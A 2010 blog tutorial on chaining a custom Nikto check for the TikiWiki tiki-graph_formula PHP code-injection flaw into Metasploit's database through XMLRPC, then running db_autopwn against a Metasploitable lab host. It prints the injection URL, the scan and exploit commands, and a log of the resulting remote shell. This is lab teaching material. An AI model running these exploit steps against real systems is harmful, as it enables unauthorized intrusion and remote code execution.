Sunday, November 28, 2010

Nikto + XMLRPC = autowpwn Metasploitable?

The following is based on my experiences and (limited) knowledge. I am not an expert in anything, nor will I likely ever be one. My hope is that this might help someone, somewhere, sometime. If nothing else, it might be a good start for discussion.

Preamble
This exercise is for educational use only, and is intended to be used in a lab environment, or as part of an authorized pentest. Please always ensure any scans or changes to systems are part of your pentest scope and comply with your rules of engagement.

Requirements and Background

After attending a recent security conference, I wanted to learn a little more about Metasploit database logging, xmlrpc and integration with other tools.
What better way to learn then to hack something?
This exercise will walk trough setting up a postgres database in Metasploit, adding a custom check for a vulnerability in Nikto, writing Nikto results to the Metasploit database, and finally using db_autopwn to get a shell from the Nikto scan.


Process
First things first. Setting up the msf database.
In Metasploit, you will want to use postgress (or mysql) as your sql database. To check which driver is available in Metasploit, launch Metasploit
msf > db_driver
[*]    Active Driver: postgresql
[*]        Available: postgresql, mysql, sqlite3
Assuming that postgres is available, create a db as per http://www.metasploit.com/redmine/projects/framework/wiki/Postgres_setup

It is possible to have other applications write to the database is to use the xmlrpc interface of Metasploit.
For more information on this see http://blog.happypacket.net/, and watch Ryan's video from Defcon 18.
msf > load xmlrpc Pass=password123 ServerType=Web[*] XMLRPC Service:  127.0.0.1:55553
[*] XMLRPC Username: msf
[*] XMLRPC Password: password123
[*] XMLRPC Server Type: Web
[*] XMLRPC Web URI: /RPC2
[*] Successfully loaded plugin: xmlrpc

This sets up the web xmlrpc interface running on port 55553.
Now, in order to do the autopwn, we have to add our own test for a vulnerability that we know Metasploitable is susceptible to into Nikto.

We will use the same vulnerability in the previous exercise, the tikiwiki_graph_formula_exec.

Let's look at this exploit a little deeper.
There are two ways to figure out how to detect the vulnerability. First let's look at the code for the exploit itself nano /pentest/exploits/framework3/modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb
This looks like the place it happens
        # This function will build a fairly randomish query string to be used
        # when exploiting this vulnerability :)
        #
       def build_uri(f_val)
                uri = ''
                uri << datastore['URI']
                uri << "/tiki-graph_formula.php?"
.... and we could dissect this a little further in order to build the http request to check for the vulnerability,
but there is an easier way. Instead lets look at the description for the exploit.
msf> info unix/webapp/tikiwiki_graph_formula_exec       Name: TikiWiki tiki-graph_formula Remote PHP Code Execution
      Version: 10394
      Platform: PHP
.... removed to shorten post 
Description:
  TikiWiki (<= 1.9.8) contains a flaw that may allow a remote attacker
  to execute arbitrary PHP code. The issue is due to
  'tiki-graph_formula.php' script not properly sanitizing user input
  supplied to create_function(), which may allow a remote attacker to
  execute arbitrary PHP code resulting in a loss of integrity.
References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2007-5423
  http://www.osvdb.org/40478
  http://www.securityfocus.com/bid/26006
Following the osvdb link there plain as day is a manual test string that we can use in Nikto.

The new string will need to be added to the db_tests file in your Nikto/Plugins directory. After you make sure you have a backup file, add a line like

"006XXX","40478","b","/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=","GET","200","","","","","This device may hav a vulnerable installation of TikiWiki.","",""
where 006xxx is the one number greater then the last entry in your db_test file. 40478 is the osvdb number. This will be important for db_autopwn.
Save the file and then launch Nikto.

./nikto.pl -host http://10.13.37.245 -Format msf -o msf:password123@http://localhost:55553/RPC2

 (make sure you type the same username and password as when you setup the xmlrpc listener)

All of the scan results are saved in the msf database in realtime.
msf > db_hosts
Hosts
=====
address       address6  arch  comm  comments  created_at                    info  mac  name          os_flavor  os_lang  os_name  os_sp  purpose  state  updated_at                    svcs  vulns  workspace
-------       --------  ----  ----  --------  ----------                    ----  ---  ----          ---------  -------  -------  -----  -------  -----  ----------                    ----  -----  ---------
10.13.37.245                                  Tue Nov 09 03:04:25 UTC 2010        00:0C:29:FB:5A:11  10.13.37.245                                               alive  Wed Nov 10 00:23:09 UTC 2010  12    6      default

msf > db_vulns.....
[*] Time: Tue Nov 09 00:21:58 UTC 2010 Vuln: host=10.13.37.245 port=80 proto=tcp name=nikto.003584 refs=OSVDB-3233
[*] Time: Tue Nov 10 00:22:14 UTC 2010 Vuln: host=10.13.37.245 port=80 proto=tcp name=nikto.005988 refs=OSVDB-5292
[*] Time: Wed Nov 10 00:23:08 UTC 2010 Vuln: host=10.13.37.245 port=80 proto=tcp name=nikto.006453 refs=OSVDB-40478
                   Notice how Nikto tested for and detected the tiki-wiki vulnerability.

Metasploits autopwn is a great thing to play around with and is great to help you make amazing demos, but if not used wisely it can get you into trouble. For this exercise, were going for the wow factor, so were going to use it.
msf> db_autopwn -x -e

[*] (1/1 [0 sessions]): Launching exploit/unix/webapp/tikiwiki_graph_formula_exec against 10.13.37.245:80...
[*] (1/1 [0 sessions]): Waiting on 1 launched modules to finish execution...
[*] Command shell session 1 opened (10.13.37.136:33818 -> 10.13.37.245:17896) at Tue Nov 09 19:25:10 -0500 2010
msf> sessions -i 1[*] Starting interaction with 1...
ls /tmp5489.jsvc_up
uname -aLinux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

As you can see, we ran db_autopown with the -x (select based on vuln references) and-e (launch exploits) and were rewarded with a shell.

Next Steps
This was just a quick introduction, and I have a lot more to learn about Metasploit's database and xmlrpc support, so stay tuned for more

No comments:

Post a Comment